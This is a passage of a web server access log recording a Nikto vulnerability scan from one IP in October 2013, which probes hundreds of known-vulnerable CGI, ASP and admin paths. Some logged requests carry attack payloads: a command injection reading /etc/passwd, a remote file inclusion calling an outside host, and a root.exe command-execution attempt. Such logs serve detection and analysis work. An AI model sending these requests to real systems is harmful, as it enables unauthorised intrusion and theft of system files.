  418. 84.56.69.222 - - [23/Oct/2013:15:26:11 +0400] "GET /webcgi/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000089)"
  419. 84.56.69.222 - - [23/Oct/2013:15:26:11 +0400] "GET /scripts/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000089)"
  420. 84.56.69.222 - - [23/Oct/2013:15:26:11 +0400] "GET /webcgi/mt-static/mt-check.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000090)"
  421. 84.56.69.222 - - [23/Oct/2013:15:26:11 +0400] "GET /scripts/mt-static/mt-check.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000090)"
  422. 84.56.69.222 - - [23/Oct/2013:15:26:11 +0400] "GET /webcgi/mt/mt-check.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000091)"
  423. 84.56.69.222 - - [23/Oct/2013:15:26:12 +0400] "GET /scripts/mt/mt-check.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000091)"
  424. 84.56.69.222 - - [23/Oct/2013:15:26:12 +0400] "GET /cfdocs/expeval/openfile.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000092)"
  425. 84.56.69.222 - - [23/Oct/2013:15:26:19 +0400] "GET /index.php/123 HTTP/1.1" 200 47547 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000093)"
  426. 84.56.69.222 - - [23/Oct/2013:15:26:20 +0400] "GET /mambo/index.php?Itemid=neObN HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000094)"
  427. 84.56.69.222 - - [23/Oct/2013:15:26:20 +0400] "GET /profile.php?u=tpmW6a2B HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000095)"
  428. 84.56.69.222 - - [23/Oct/2013:15:26:20 +0400] "GET /ticket.php?id=99999 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000096)"
  429. 84.56.69.222 - - [23/Oct/2013:15:26:21 +0400] "GET /vgn/login/1,501,,00.html?cookieName=x--\\> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000097)"
  430. 84.56.69.222 - - [23/Oct/2013:15:26:21 +0400] "GET /a%5c.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000098)"
  431. 84.56.69.222 - - [23/Oct/2013:15:26:21 +0400] "GET /webcgi/banner.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000099)"
  432. 84.56.69.222 - - [23/Oct/2013:15:26:21 +0400] "GET /scripts/banner.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000099)"
  433. 84.56.69.222 - - [23/Oct/2013:15:26:22 +0400] "GET /webcgi/bannereditor.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000100)"
  434. 84.56.69.222 - - [23/Oct/2013:15:26:22 +0400] "GET /scripts/bannereditor.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000100)"
  435. 84.56.69.222 - - [23/Oct/2013:15:26:22 +0400] "GET /webcgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000101)"
  436. 84.56.69.222 - - [23/Oct/2013:15:26:23 +0400] "GET /scripts/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000101)"
  437. 84.56.69.222 - - [23/Oct/2013:15:26:23 +0400] "GET /admin/browse.asp?FilePath=c:\\&Opt=2&level=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000102)"
  438. 84.56.69.222 - - [23/Oct/2013:15:26:36 +0400] "GET /webcgi/architext_query.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000103)"
  439. 84.56.69.222 - - [23/Oct/2013:15:26:36 +0400] "GET /scripts/architext_query.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000103)"
  440. 84.56.69.222 - - [23/Oct/2013:15:26:37 +0400] "GET /webcgi/bizdb1-search.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000104)"
  441. 84.56.69.222 - - [23/Oct/2013:15:26:37 +0400] "GET /scripts/bizdb1-search.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000104)"
  442. 84.56.69.222 - - [23/Oct/2013:15:26:37 +0400] "GET /webcgi/blog/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000105)"
  443. 84.56.69.222 - - [23/Oct/2013:15:26:38 +0400] "GET /scripts/blog/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000105)"
  444. 84.56.69.222 - - [23/Oct/2013:15:26:38 +0400] "GET /tsweb/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000106)"
  445. 84.56.69.222 - - [23/Oct/2013:15:26:38 +0400] "GET /webcgi/blog/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000107)"
  446. 84.56.69.222 - - [23/Oct/2013:15:26:38 +0400] "GET /scripts/blog/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000107)"
  447. 84.56.69.222 - - [23/Oct/2013:15:26:39 +0400] "GET /webcgi/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000108)"
  448. 84.56.69.222 - - [23/Oct/2013:15:26:39 +0400] "GET /scripts/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000108)"
  449. 84.56.69.222 - - [23/Oct/2013:15:26:39 +0400] "GET /webcgi/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000108)"
  450. 84.56.69.222 - - [23/Oct/2013:15:26:39 +0400] "GET /scripts/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://cirt.net/rfiinc.txt? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000108)"
  451. 84.56.69.222 - - [23/Oct/2013:15:26:39 +0400] "GET /vgn/performance/TMT HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000109)"
  452. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/performance/TMT/Report HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000110)"
  453. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/performance/TMT/Report/XML HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000111)"
  454. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/performance/TMT/reset HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000112)"
  455. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/ppstats HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000113)"
  456. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/previewer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000114)"
  457. 84.56.69.222 - - [23/Oct/2013:15:26:40 +0400] "GET /vgn/record/previewer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000115)"
  458. 84.56.69.222 - - [23/Oct/2013:15:26:41 +0400] "GET /vgn/stylepreviewer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000116)"
  459. 84.56.69.222 - - [23/Oct/2013:15:26:41 +0400] "GET /vgn/vr/Deleting HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000117)"
  460. 84.56.69.222 - - [23/Oct/2013:15:26:42 +0400] "GET /vgn/vr/Editing HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000118)"
  461. 84.56.69.222 - - [23/Oct/2013:15:26:42 +0400] "GET /vgn/vr/Saving HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000119)"
  462. 84.56.69.222 - - [23/Oct/2013:15:26:42 +0400] "GET /vgn/vr/Select HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000120)"
  463. 84.56.69.222 - - [23/Oct/2013:15:26:42 +0400] "GET /scripts/iisadmin/bdir.htr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000121)"
  464. 84.56.69.222 - - [23/Oct/2013:15:26:43 +0400] "GET /scripts/iisadmin/ism.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000122)"
  465. 84.56.69.222 - - [23/Oct/2013:15:26:43 +0400] "GET /scripts/tools/ctss.idc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000123)"
  466. 84.56.69.222 - - [23/Oct/2013:15:26:43 +0400] "GET /bigconf.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000124)"
  467. 84.56.69.222 - - [23/Oct/2013:15:26:43 +0400] "GET /billing/billing.apw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000125)"
  468. 84.56.69.222 - - [23/Oct/2013:15:26:43 +0400] "GET /blah_badfile.shtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000126)"
  469. 84.56.69.222 - - [23/Oct/2013:15:26:44 +0400] "GET /blah-whatever-badfile.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000127)"
  470. 84.56.69.222 - - [23/Oct/2013:15:26:44 +0400] "GET /vgn/style HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000128)"
  471. 84.56.69.222 - - [23/Oct/2013:15:26:55 +0400] "GET /scripts/no-such-file.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000129)"
  472. 84.56.69.222 - - [23/Oct/2013:15:26:55 +0400] "GET /SiteServer/Admin/commerce/foundation/domain.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000130)"
  473. 84.56.69.222 - - [23/Oct/2013:15:26:55 +0400] "GET /SiteServer/Admin/commerce/foundation/driver.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000131)"
  474. 84.56.69.222 - - [23/Oct/2013:15:26:56 +0400] "GET /SiteServer/Admin/commerce/foundation/DSN.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000132)"
  475. 84.56.69.222 - - [23/Oct/2013:15:26:59 +0400] "GET /SiteServer/admin/findvserver.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000133)"
  476. 84.56.69.222 - - [23/Oct/2013:15:26:59 +0400] "GET /SiteServer/Admin/knowledge/dsmgr/default.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000134)"
  477. 84.56.69.222 - - [23/Oct/2013:15:26:59 +0400] "GET /webcgi/cgiwrap/%3Cfont%20color=red%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000135)"
  478. 84.56.69.222 - - [23/Oct/2013:15:26:59 +0400] "GET /scripts/cgiwrap/%3Cfont%20color=red%3E HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000135)"
  479. 84.56.69.222 - - [23/Oct/2013:15:27:00 +0400] "GET /webcgi/moin.cgi?test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000136)"
  480. 84.56.69.222 - - [23/Oct/2013:15:27:00 +0400] "GET /scripts/moin.cgi?test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000136)"
  481. 84.56.69.222 - - [23/Oct/2013:15:27:01 +0400] "GET /basilix/mbox-list.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000138)"
  482. 84.56.69.222 - - [23/Oct/2013:15:27:01 +0400] "GET /basilix/message-read.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000139)"
  483. 84.56.69.222 - - [23/Oct/2013:15:27:01 +0400] "GET /clusterframe.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000140)"
  484. 84.56.69.222 - - [23/Oct/2013:15:27:01 +0400] "GET /IlohaMail/blank.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000141)"
  485. 84.56.69.222 - - [23/Oct/2013:15:27:01 +0400] "GET /bb-dnbd/faxsurvey HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000142)"
  486. 84.56.69.222 - - [23/Oct/2013:15:27:02 +0400] "GET /cartcart.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000143)"
  487. 84.56.69.222 - - [23/Oct/2013:15:27:02 +0400] "GET /scripts/Carello/Carello.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000144)"
  488. 84.56.69.222 - - [23/Oct/2013:15:27:02 +0400] "GET /scripts/tools/dsnform.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000145)"
  489. 84.56.69.222 - - [23/Oct/2013:15:27:02 +0400] "GET /scripts/tools/dsnform HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000146)"
  490. 84.56.69.222 - - [23/Oct/2013:15:27:02 +0400] "GET /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000147)"
  491. 84.56.69.222 - - [23/Oct/2013:15:27:03 +0400] "GET /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000148)"
  492. 84.56.69.222 - - [23/Oct/2013:15:27:13 +0400] "GET /prd.i/pgen/ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000149)"
  493. 84.56.69.222 - - [23/Oct/2013:15:27:14 +0400] "GET /readme.eml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000150)"
  494. 84.56.69.222 - - [23/Oct/2013:15:27:14 +0400] "GET /scripts/httpodbc.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000151)"
  495. 84.56.69.222 - - [23/Oct/2013:15:27:15 +0400] "GET /scripts/proxy/w3proxy.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000152)"
  496. 84.56.69.222 - - [23/Oct/2013:15:27:15 +0400] "GET /scripts/root.exe?/c+dir+c:\\+/OG HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000153)"
  497. 84.56.69.222 - - [23/Oct/2013:15:27:15 +0400] "GET /SiteServer/admin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000154)"
  498. 84.56.69.222 - - [23/Oct/2013:15:27:16 +0400] "GET /siteseed/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000155)"
  499. 84.56.69.222 - - [23/Oct/2013:15:27:16 +0400] "GET /scripts/samples/search/author.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000156)"
  500. 84.56.69.222 - - [23/Oct/2013:15:27:17 +0400] "GET /scripts/samples/search/filesize.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000157)"
  501. 84.56.69.222 - - [23/Oct/2013:15:27:17 +0400] "GET /scripts/samples/search/filetime.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000158)"
  502. 84.56.69.222 - - [23/Oct/2013:15:27:17 +0400] "GET /scripts/samples/search/queryhit.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000159)"
  503. 84.56.69.222 - - [23/Oct/2013:15:27:17 +0400] "GET /scripts/samples/search/simple.idq HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000160)"
  504. 84.56.69.222 - - [23/Oct/2013:15:27:17 +0400] "GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000161)"
  505. 84.56.69.222 - - [23/Oct/2013:15:27:18 +0400] "GET /iisadmin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000162)"
  506. 84.56.69.222 - - [23/Oct/2013:15:27:18 +0400] "GET /password.inc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000163)"
  507. 84.56.69.222 - - [23/Oct/2013:15:27:18 +0400] "GET /PDG_Cart/oder.log HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000164)"
  508. 84.56.69.222 - - [23/Oct/2013:15:27:18 +0400] "GET /global.asa HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000166)"
  509. 84.56.69.222 - - [23/Oct/2013:15:27:19 +0400] "GET /exchange/lib/AMPROPS.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000167)"
  510. 84.56.69.222 - - [23/Oct/2013:15:27:19 +0400] "GET /exchange/lib/DELETE.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000168)"
  511. 84.56.69.222 - - [23/Oct/2013:15:27:19 +0400] "GET /exchange/lib/GETREND.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000169)"
  512. 84.56.69.222 - - [23/Oct/2013:15:27:19 +0400] "GET /exchange/lib/GETWHEN.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000170)"
  513. 84.56.69.222 - - [23/Oct/2013:15:27:19 +0400] "GET /exchange/lib/JSATTACH.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000171)"
  514. 84.56.69.222 - - [23/Oct/2013:15:27:20 +0400] "GET /exchange/lib/JSROOT.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000172)"
  515. 84.56.69.222 - - [23/Oct/2013:15:27:20 +0400] "GET /exchange/lib/JSUTIL.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000173)"
  516. 84.56.69.222 - - [23/Oct/2013:15:27:20 +0400] "GET /exchange/lib/LANG.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000174)"
  517. 84.56.69.222 - - [23/Oct/2013:15:27:34 +0400] "GET /exchange/lib/logon.inc HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000175)"
  518. 84.56.69.222 - - [23/Oct/2013:15:27:34 +0400] "GET /exchange/lib/PAGEUTIL.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000176)"
  519. 84.56.69.222 - - [23/Oct/2013:15:27:34 +0400] "GET /exchange/lib/PUBFLD.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000177)"
  520. 84.56.69.222 - - [23/Oct/2013:15:27:34 +0400] "GET /exchange/lib/RENDER.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000178)"
  521. 84.56.69.222 - - [23/Oct/2013:15:27:35 +0400] "GET /exchange/lib/SESSION.INC HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000179)"
  522. 84.56.69.222 - - [23/Oct/2013:15:27:35 +0400] "GET /ows/restricted%2eshow HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000180)"
  523. 84.56.69.222 - - [23/Oct/2013:15:27:35 +0400] "GET /WEB-INF./web.xml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000181)"
  524. 84.56.69.222 - - [23/Oct/2013:15:27:35 +0400] "GET /view_source.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000182)"
  525. 84.56.69.222 - - [23/Oct/2013:15:27:35 +0400] "GET /w-agora/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000183)"
  526. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /vider.php3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000184)"
  527. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /exchange/root.asp?acs=anon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000185)"
  528. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /officescan/cgi/cgiChkMasterPwd.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000186)"
  529. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /%NETHOOD%/ HTTP/1.1" 400 288 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000187)"
  530. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /webcgi/astrocam.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000188)"
  531. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /scripts/astrocam.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000188)"
  532. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /webcgi/badmin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000189)"
  533. 84.56.69.222 - - [23/Oct/2013:15:27:36 +0400] "GET /scripts/badmin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000189)"
  534. 84.56.69.222 - - [23/Oct/2013:15:27:37 +0400] "GET /webcgi/boozt/admin/index.cgi?section=5&input=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000190)"
  535. 84.56.69.222 - - [23/Oct/2013:15:27:37 +0400] "GET /scripts/boozt/admin/index.cgi?section=5&input=1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000190)"
  536. 84.56.69.222 - - [23/Oct/2013:15:27:39 +0400] "GET /webcgi/ezadmin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000191)"
  537. 84.56.69.222 - - [23/Oct/2013:15:27:39 +0400] "GET /scripts/ezadmin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000191)"
  538. 84.56.69.222 - - [23/Oct/2013:15:27:39 +0400] "GET /webcgi/ezboard.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000192)"
  539. 84.56.69.222 - - [23/Oct/2013:15:27:39 +0400] "GET /scripts/ezboard.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000192)"
  540. 84.56.69.222 - - [23/Oct/2013:15:27:39 +0400] "GET /webcgi/ezman.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000193)"
  541. 84.56.69.222 - - [23/Oct/2013:15:27:40 +0400] "GET /scripts/ezman.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000193)"
  542. 84.56.69.222 - - [23/Oct/2013:15:27:53 +0400] "GET /webcgi/foxweb.dll HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000194)"
  543. 84.56.69.222 - - [23/Oct/2013:15:27:54 +0400] "GET /scripts/foxweb.dll HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000194)"
  544. 84.56.69.222 - - [23/Oct/2013:15:27:55 +0400] "GET /webcgi/foxweb.exe HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000195)"
  545. 84.56.69.222 - - [23/Oct/2013:15:28:05 +0400] "GET /scripts/foxweb.exe HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000195)"
  546. 84.56.69.222 - - [23/Oct/2013:15:28:05 +0400] "GET /webcgi/mgrqcgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000196)"
  547. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /scripts/mgrqcgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000196)"
  548. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /webcgi/wconsole.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000197)"
  549. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /scripts/wconsole.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000197)"
  550. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /webcgi/webplus.exe?about HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000198)"
  551. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /scripts/webplus.exe?about HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000198)"
  552. 84.56.69.222 - - [23/Oct/2013:15:28:06 +0400] "GET /pbserver/pbserver.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000199)"
